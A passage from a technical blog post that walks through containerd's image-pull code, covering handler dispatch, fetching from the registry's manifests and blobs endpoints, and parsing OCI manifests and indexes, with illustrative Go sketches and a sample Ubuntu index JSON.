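// registration order and collect all the children they return.
func chain(handlers ...HandlerFunc) HandlerFunc {
	return func(desc Descriptor) ([]Descriptor, error) {
		var children []Descriptor
		for _, h := range handlers {
			ch, err := h(desc)
			if err != nil {
				return nil, err
			}
			children = append(children, ch...)
		}
		return children, nil
	}
}

// dispatch is a sequential simplification of Dispatch(): handle one
// descriptor, then recurse into whatever children the handler returned.
func dispatch(handler HandlerFunc, descs ...Descriptor) error {
	for _, desc := range descs {
		children, err := handler(desc)
		if err != nil {
			return err
		}
		if len(children) > 0 {
			if err := dispatch(handler, children...); err != nil {
				return err
			}
		}
	}
	return nil
}

// walk dispatches over a toy graph and returns the visiting order.
func walk(graph map[string][]string, root string) ([]string, error) {
	var visited []string
	// record plays the role of a fetch-like handler with no children.
	record := func(desc Descriptor) ([]Descriptor, error) {
		visited = append(visited, desc.Digest)
		return nil, nil
	}
	// childrenOf plays the role of a children handler.
	childrenOf := func(desc Descriptor) ([]Descriptor, error) {
		var out []Descriptor
		for _, d := range graph[desc.Digest] {
			out = append(out, Descriptor{Digest: d})
		}
		return out, nil
	}
	err := dispatch(chain(record, childrenOf), Descriptor{Digest: root})
	return visited, err
}

func main() {
	graph := map[string][]string{
		"index":    {"manifest"},
		"manifest": {"config", "layer"},
	}
	visited, err := walk(graph, "index")
	fmt.Println(visited, err)
}
```

<p>In this model the index is handled first, then its manifest, then the config and layer the manifest points to. The recursion stops on its own once a descriptor has no children.</p>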

<p>The flow is as follows:</p>

<p><img src="/assets/image-20260601000000002.png" alt="image-20260601000000002" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p><br /></p>

<p>We first analyze <code class="language-plaintext highlighter-rouge">FetchHandler()</code>, the handler that <strong>fetches data from the remote</strong>. The call flow ends up at <code class="language-plaintext highlighter-rouge">Fetch()</code> in <code class="language-plaintext highlighter-rouge">fetcher.go</code> [6].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/handlers.go</span>
<span class="k">func</span> <span class="n">FetchHandler</span><span class="p">(</span><span class="n">ingester</span> <span class="n">content</span><span class="o">.</span><span class="n">Ingester</span><span class="p">,</span> <span class="n">fetcher</span> <span class="n">Fetcher</span><span class="p">)</span> <span class="n">images</span><span class="o">.</span><span class="n">HandlerFunc</span> <span class="p">{</span>
    <span class="k">return</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">err</span> <span class="o">:=</span> <span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">ingester</span><span class="p">,</span> <span class="n">fetcher</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// &lt;--------</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">ingester</span> <span class="n">content</span><span class="o">.</span><span class="n">Ingester</span><span class="p">,</span> <span class="n">fetcher</span> <span class="n">Fetcher</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">rc</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">fetcher</span><span class="o">.</span><span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// [6]</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">content</span><span class="o">.</span><span class="n">Copy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">cw</span><span class="p">,</span> <span class="n">rc</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This function calls <code class="language-plaintext highlighter-rouge">r.open()</code> to fetch image data from one of three sources: external URLs [7], the <code class="language-plaintext highlighter-rouge">"manifests"</code> endpoint [8] if the descriptor is an index or a manifest, and the <code class="language-plaintext highlighter-rouge">"blobs"</code> endpoint [9] for all other types.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/remotes/docker/fetcher.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="n">dockerFetcher</span><span class="p">)</span> <span class="n">Fetch</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">ReadCloser</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">newHTTPReadSeeker</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">Size</span><span class="p">,</span> <span class="k">func</span><span class="p">(</span><span class="n">offset</span> <span class="kt">int64</span><span class="p">)</span> <span class="p">(</span><span class="n">io</span><span class="o">.</span><span class="n">ReadCloser</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [7] firstly try fetch via external urls</span>
        <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">us</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">desc</span><span class="o">.</span><span class="n">URLs</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">rc</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="no">false</span><span class="p">)</span>
        <span class="p">}</span>

        <span class="c">// [8] Try manifests endpoints for manifests types</span>
        <span class="k">if</span> <span class="n">images</span><span class="o">.</span><span class="n">IsManifestType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="o">||</span> <span class="n">images</span><span class="o">.</span><span class="n">IsIndexType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">host</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">r</span><span class="o">.</span><span class="n">hosts</span> <span class="p">{</span>
                <span class="n">req</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">request</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">MethodGet</span><span class="p">,</span> <span class="s">"manifests"</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="o">.</span><span class="n">String</span><span class="p">())</span>
                <span class="c">//[...]</span>
                <span class="c">//[...]</span>
                <span class="n">rc</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">i</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">hosts</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">)</span>
            <span class="p">}</span>

            <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">firstErr</span>
        <span class="p">}</span>

        <span class="c">//[9] Finally use blobs endpoints</span>
        <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">host</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">r</span><span class="o">.</span><span class="n">hosts</span> <span class="p">{</span>
            <span class="n">req</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">request</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">http</span><span class="o">.</span><span class="n">MethodGet</span><span class="p">,</span> <span class="s">"blobs"</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">Digest</span><span class="o">.</span><span class="n">String</span><span class="p">())</span>
            <span class="c">// [...]</span>
            <span class="n">rc</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">r</span><span class="o">.</span><span class="n">open</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">i</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">r</span><span class="o">.</span><span class="n">hosts</span><span class="p">)</span><span class="o">-</span><span class="m">1</span><span class="p">)</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>

        <span class="c">// [...]</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>
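<p>The endpoint choice at [8] and [9] can be sketched as a small standalone function. This is only an illustration: it ignores the external URLs at [7], covers just the common OCI and Docker media types, and assumes the usual registry URL layout <code class="language-plaintext highlighter-rouge">/v2/&lt;name&gt;/manifests/&lt;digest&gt;</code> and <code class="language-plaintext highlighter-rouge">/v2/&lt;name&gt;/blobs/&lt;digest&gt;</code>. The helpers <code class="language-plaintext highlighter-rouge">endpointFor</code> and <code class="language-plaintext highlighter-rouge">fetchURL</code> are hypothetical, as are the host, repository, and digest values in <code class="language-plaintext highlighter-rouge">main</code>.</p>

```go
package main

import "fmt"

// isManifestOrIndex reports whether mediaType names an image manifest or an
// image index. The list covers the common OCI and Docker media types only.
func isManifestOrIndex(mediaType string) bool {
	switch mediaType {
	case "application/vnd.oci.image.manifest.v1+json",
		"application/vnd.oci.image.index.v1+json",
		"application/vnd.docker.distribution.manifest.v2+json",
		"application/vnd.docker.distribution.manifest.list.v2+json":
		return true
	}
	return false
}

// endpointFor picks the registry endpoint: manifests and indexes use
// "manifests", everything else (configs, layers, ...) uses "blobs".
func endpointFor(mediaType string) string {
	if isManifestOrIndex(mediaType) {
		return "manifests"
	}
	return "blobs"
}

// fetchURL builds a URL of the form /v2/<repo>/<endpoint>/<digest>.
// host and repo are hypothetical inputs for this sketch.
func fetchURL(host, repo, mediaType, digest string) string {
	return fmt.Sprintf("https://%s/v2/%s/%s/%s", host, repo, endpointFor(mediaType), digest)
}

func main() {
	// Placeholder digests, not real content.
	fmt.Println(fetchURL("registry.example", "library/ubuntu",
		"application/vnd.oci.image.index.v1+json", "sha256:aaaa"))
	fmt.Println(fetchURL("registry.example", "library/ubuntu",
		"application/vnd.oci.image.layer.v1.tar+gzip", "sha256:bbbb"))
}
```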

<p><code class="language-plaintext highlighter-rouge">open()</code> calls <code class="language-plaintext highlighter-rouge">req.doWithRetries()</code>, which is the function that authenticates and sends the request.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">func</span> <span class="p">(</span><span class="n">r</span> <span class="n">dockerFetcher</span><span class="p">)</span> <span class="n">open</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">request</span><span class="p">,</span> <span class="n">mediatype</span> <span class="kt">string</span><span class="p">,</span> <span class="n">offset</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">lastHost</span> <span class="kt">bool</span><span class="p">)</span> <span class="p">(</span><span class="n">_</span> <span class="n">io</span><span class="o">.</span><span class="n">ReadCloser</span><span class="p">,</span> <span class="n">_</span> <span class="kt">int64</span><span class="p">,</span> <span class="n">retErr</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">resp</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">req</span><span class="o">.</span><span class="n">doWithRetries</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">lastHost</span><span class="p">,</span> <span class="n">withErrorCheck</span><span class="p">,</span> <span class="n">withOffsetCheck</span><span class="p">(</span><span class="n">offset</span><span class="p">,</span> <span class="n">parallelism</span><span class="p">))</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>If you’re curious about what the response data looks like, you can find out in the next section.</p>

<h3 id="14-download-manifest--blob">1.4. Download Manifest &amp; Blob</h3>

<p>The next handler is <code class="language-plaintext highlighter-rouge">ChildrenHandler()</code>, and its job is to parse the returned JSON data.</p>

<p>If the descriptor type is a manifest, the JSON is unmarshalled into an <code class="language-plaintext highlighter-rouge">ocispec.Manifest</code> structure [1], and the <code class="language-plaintext highlighter-rouge">Config</code> and <code class="language-plaintext highlighter-rouge">Layers</code> fields are returned as descriptors [2]; if the type is an index, the JSON is unmarshalled into an <code class="language-plaintext highlighter-rouge">ocispec.Index</code> structure [3], and the <code class="language-plaintext highlighter-rouge">Manifests</code> field is returned as descriptors [4].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/containerd/containerd/v2/core/images/handlers.go</span>
<span class="k">func</span> <span class="n">ChildrenHandler</span><span class="p">(</span><span class="n">provider</span> <span class="n">content</span><span class="o">.</span><span class="n">Provider</span><span class="p">)</span> <span class="n">HandlerFunc</span> <span class="p">{</span>
    <span class="k">return</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">Children</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">provider</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/containerd/containerd/v2/core/images/image.go</span>
<span class="k">func</span> <span class="n">Children</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">provider</span> <span class="n">content</span><span class="o">.</span><span class="n">Provider</span><span class="p">,</span> <span class="n">desc</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">)</span> <span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">IsManifestType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">p</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">content</span><span class="o">.</span><span class="n">ReadBlob</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">provider</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span>
        <span class="k">var</span> <span class="n">manifest</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Manifest</span> <span class="c">// [1]</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">manifest</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="nb">append</span><span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{</span><span class="n">manifest</span><span class="o">.</span><span class="n">Config</span><span class="p">},</span> <span class="n">manifest</span><span class="o">.</span><span class="n">Layers</span><span class="o">...</span><span class="p">),</span> <span class="no">nil</span> <span class="c">// [2]</span>

    <span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="n">IsIndexType</span><span class="p">(</span><span class="n">desc</span><span class="o">.</span><span class="n">MediaType</span><span class="p">)</span> <span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">p</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">content</span><span class="o">.</span><span class="n">ReadBlob</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">provider</span><span class="p">,</span> <span class="n">desc</span><span class="p">)</span>
        <span class="k">var</span> <span class="n">index</span> <span class="n">ocispec</span><span class="o">.</span><span class="n">Index</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">json</span><span class="o">.</span><span class="n">Unmarshal</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">index</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
            <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
        <span class="k">return</span> <span class="nb">append</span><span class="p">([]</span><span class="n">ocispec</span><span class="o">.</span><span class="n">Descriptor</span><span class="p">{},</span> <span class="n">index</span><span class="o">.</span><span class="n">Manifests</span><span class="o">...</span><span class="p">),</span> <span class="no">nil</span> <span class="c">// [4]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
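<p>The same parsing logic can be tried outside of containerd with a few trimmed-down types. The sketch below assumes only the OCI media types and keeps just three descriptor fields; the <code class="language-plaintext highlighter-rouge">descriptor</code>, <code class="language-plaintext highlighter-rouge">manifest</code>, <code class="language-plaintext highlighter-rouge">index</code> types and the <code class="language-plaintext highlighter-rouge">children</code> function are hypothetical simplifications, and the digests in <code class="language-plaintext highlighter-rouge">main</code> are placeholders.</p>

```go
package main

import (
	"encoding/json"
	"fmt"
)

// descriptor keeps only the fields of ocispec.Descriptor used here.
type descriptor struct {
	MediaType string `json:"mediaType"`
	Digest    string `json:"digest"`
	Size      int64  `json:"size"`
}

// manifest and index are trimmed versions of the OCI structures.
type manifest struct {
	Config descriptor   `json:"config"`
	Layers []descriptor `json:"layers"`
}

type index struct {
	Manifests []descriptor `json:"manifests"`
}

// children returns the descriptors referenced by blob, depending on its type.
func children(mediaType string, blob []byte) ([]descriptor, error) {
	switch mediaType {
	case "application/vnd.oci.image.manifest.v1+json":
		var m manifest
		if err := json.Unmarshal(blob, &m); err != nil {
			return nil, err
		}
		// A manifest points at one config plus its layers.
		return append([]descriptor{m.Config}, m.Layers...), nil
	case "application/vnd.oci.image.index.v1+json":
		var idx index
		if err := json.Unmarshal(blob, &idx); err != nil {
			return nil, err
		}
		// An index points at other manifests.
		return append([]descriptor{}, idx.Manifests...), nil
	}
	// Leaf types such as configs and layers have no children.
	return nil, nil
}

func main() {
	blob := []byte(`{
		"config": {"mediaType": "application/vnd.oci.image.config.v1+json", "digest": "sha256:aaaa", "size": 1},
		"layers": [{"mediaType": "application/vnd.oci.image.layer.v1.tar+gzip", "digest": "sha256:bbbb", "size": 2}]
	}`)
	descs, err := children("application/vnd.oci.image.manifest.v1+json", blob)
	if err != nil {
		panic(err)
	}
	for _, d := range descs {
		fmt.Println(d.MediaType, d.Digest, d.Size)
	}
}
```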

<p>The structures with the <code class="language-plaintext highlighter-rouge">ocispec</code> prefix are defined in the <a href="https://github.com/opencontainers/image-spec">opencontainers/image-spec</a> repository. They follow the <strong>OCI (Open Container Initiative)</strong> specifications, a set of open standards that define how containers and container images should be formatted and run so that tools from different vendors can interoperate.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/opencontainers/image-spec/specs-go/v1/index.go</span>
<span class="k">type</span> <span class="n">Index</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">specs</span><span class="o">.</span><span class="n">Versioned</span>
    <span class="n">MediaType</span> <span class="kt">string</span> <span class="s">`json:"mediaType,omitempty"`</span>
    <span class="n">ArtifactType</span> <span class="kt">string</span> <span class="s">`json:"artifactType,omitempty"`</span>
    <span class="n">Manifests</span> <span class="p">[]</span><span class="n">Descriptor</span> <span class="s">`json:"manifests"`</span>
    <span class="n">Subject</span> <span class="o">*</span><span class="n">Descriptor</span> <span class="s">`json:"subject,omitempty"`</span>
    <span class="n">Annotations</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span> <span class="s">`json:"annotations,omitempty"`</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/opencontainers/image-spec/specs-go/v1/manifest.go</span>
<span class="k">type</span> <span class="n">Manifest</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">specs</span><span class="o">.</span><span class="n">Versioned</span>
    <span class="n">MediaType</span> <span class="kt">string</span> <span class="s">`json:"mediaType,omitempty"`</span>
    <span class="n">ArtifactType</span> <span class="kt">string</span> <span class="s">`json:"artifactType,omitempty"`</span>
    <span class="n">Config</span> <span class="n">Descriptor</span> <span class="s">`json:"config"`</span>
    <span class="n">Layers</span> <span class="p">[]</span><span class="n">Descriptor</span> <span class="s">`json:"layers"`</span>
    <span class="n">Subject</span> <span class="o">*</span><span class="n">Descriptor</span> <span class="s">`json:"subject,omitempty"`</span>
    <span class="n">Annotations</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span> <span class="s">`json:"annotations,omitempty"`</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The other handlers and decorators are neither complicated nor important. For example, they filter out unneeded descriptors and keep only the image matching the host architecture, so we skip them here.</p>

<p>One thing is worth mentioning: you may notice there are two entries for the amd64 image in the index JSON. Only the first one is the <strong>real image data</strong> (cdb…eff). The second one is the <strong>attestation</strong> (01a…169) of the first entry, that is, signed metadata that makes a verifiable claim about an artifact.</p>

<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="w">
    </span><span class="nl">"manifests"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
        </span><span class="p">{</span><span class="w">
            </span><span class="nl">"annotations"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
                </span><span class="nl">"com.docker.official-images.bashbrew.arch"</span><span class="p">:</span><span class="w"> </span><span class="s2">"amd64"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.base.name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"scratch"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.created"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2026-04-10T00:00:00Z"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.revision"</span><span class="p">:</span><span class="w"> </span><span class="s2">"a17a2429ff85ab773e86c558a75ae62053ef9936"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.source"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://git.launchpad.net/cloud-images/+oci/ubuntu-base"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.url"</span><span class="p">:</span><span class="w"> </span><span class="s2">"https://hub.docker.com/_/ubuntu"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"org.opencontainers.image.version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"24.04"</span><span class="w">
            </span><span class="p">},</span><span class="w">
            </span><span class="nl">"digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:cdb5fd928fced577cfecf12c8966e830fcdf42ee481fb0b91904eeddc2fe5eff"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.manifest.v1+json"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"platform"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
                </span><span class="nl">"architecture"</span><span class="p">:</span><span class="w"> </span><span class="s2">"amd64"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"os"</span><span class="p">:</span><span class="w"> </span><span class="s2">"linux"</span><span class="w">
            </span><span class="p">},</span><span class="w">
            </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">424</span><span class="w">
        </span><span class="p">},</span><span class="w">
        </span><span class="p">{</span><span class="w">
            </span><span class="nl">"annotations"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
                </span><span class="nl">"com.docker.official-images.bashbrew.arch"</span><span class="p">:</span><span class="w"> </span><span class="s2">"amd64"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"vnd.docker.reference.digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:cdb5fd928fced577cfecf12c8966e830fcdf42ee481fb0b91904eeddc2fe5eff"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"vnd.docker.reference.type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"attestation-manifest"</span><span class="w">
            </span><span class="p">},</span><span class="w">
            </span><span class="nl">"digest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"sha256:01a14a568a5c77390e74eefc7a2106206f4605338cb7e86e8bf06a18452b5169"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"mediaType"</span><span class="p">:</span><span class="w"> </span><span class="s2">"application/vnd.oci.image.manifest.v1+json"</span><span class="p">,</span><span class="w">
            </span><span class="nl">"platform"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w">
                </span><span class="nl">"architecture"</span><span class="p">:</span><span class="w"> </span><span class="s2">"unknown"</span><span class="p">,</span><span class="w">
                </span><span class="nl">"os"</span><span class="p">:</span><span class="w"> </span><span class="s2">"unknown"</span><span class="w">
            </span><span class="p">},</span><span class="w">
            </span><span class="nl">"size"</span><span class="p">:</span><span class="w"> </span><span class="mi">562</span><span class="w">
        </span><span class="p">}</span><span class="w">
        </span><span class="err">...</span><span class="w">
    </span><span class="p">]</span><span class="w">
</span><span class="p">}</span><span class="w">
</span></code></pre></div></div>
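<p>A reader who wants to pick the real image out of such an index could do something like the following. This is a simplified sketch, not how containerd filters descriptors: it matches the platform by plain string comparison and additionally skips any entry whose <code class="language-plaintext highlighter-rouge">vnd.docker.reference.type</code> annotation is <code class="language-plaintext highlighter-rouge">attestation-manifest</code>. The <code class="language-plaintext highlighter-rouge">selectImage</code> and <code class="language-plaintext highlighter-rouge">isAttestation</code> helpers are hypothetical, and <code class="language-plaintext highlighter-rouge">sampleIndex</code> is a trimmed copy of the JSON above.</p>

```go
package main

import (
	"encoding/json"
	"fmt"
)

type platform struct {
	Architecture string `json:"architecture"`
	OS           string `json:"os"`
}

// entry keeps only the index fields needed for selection.
type entry struct {
	Digest      string            `json:"digest"`
	Platform    platform          `json:"platform"`
	Annotations map[string]string `json:"annotations"`
}

type index struct {
	Manifests []entry `json:"manifests"`
}

// sampleIndex is a trimmed copy of the index shown in the post.
const sampleIndex = `{
  "manifests": [
    {
      "digest": "sha256:cdb5fd928fced577cfecf12c8966e830fcdf42ee481fb0b91904eeddc2fe5eff",
      "platform": {"architecture": "amd64", "os": "linux"}
    },
    {
      "annotations": {
        "vnd.docker.reference.digest": "sha256:cdb5fd928fced577cfecf12c8966e830fcdf42ee481fb0b91904eeddc2fe5eff",
        "vnd.docker.reference.type": "attestation-manifest"
      },
      "digest": "sha256:01a14a568a5c77390e74eefc7a2106206f4605338cb7e86e8bf06a18452b5169",
      "platform": {"architecture": "unknown", "os": "unknown"}
    }
  ]
}`

// isAttestation reports whether the entry is marked as an attestation.
func isAttestation(e entry) bool {
	return e.Annotations["vnd.docker.reference.type"] == "attestation-manifest"
}

// selectImage returns the digest of the first non-attestation manifest
// whose platform matches goos/goarch.
func selectImage(blob []byte, goos, goarch string) (string, error) {
	var idx index
	if err := json.Unmarshal(blob, &idx); err != nil {
		return "", err
	}
	for _, e := range idx.Manifests {
		if isAttestation(e) {
			continue
		}
		if e.Platform.OS == goos && e.Platform.Architecture == goarch {
			return e.Digest, nil
		}
	}
	return "", fmt.Errorf("no manifest for %s/%s", goos, goarch)
}

func main() {
	digest, err := selectImage([]byte(sampleIndex), "linux", "amd64")
	fmt.Println(digest, err)
}
```

<p>Note that the attestation entry declares its platform as <code class="language-plaintext highlighter-rouge">unknown</code>/<code class="language-plaintext highlighter-rouge">unknown</code>, so a platform match alone would already exclude it; the annotation check just makes the intent explicit.</p>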

<p>The attestation blob is a pretty large JSON file, and I have no idea how it’s generated or how to use it 😆. I’ll just leave part of the content below.</p>

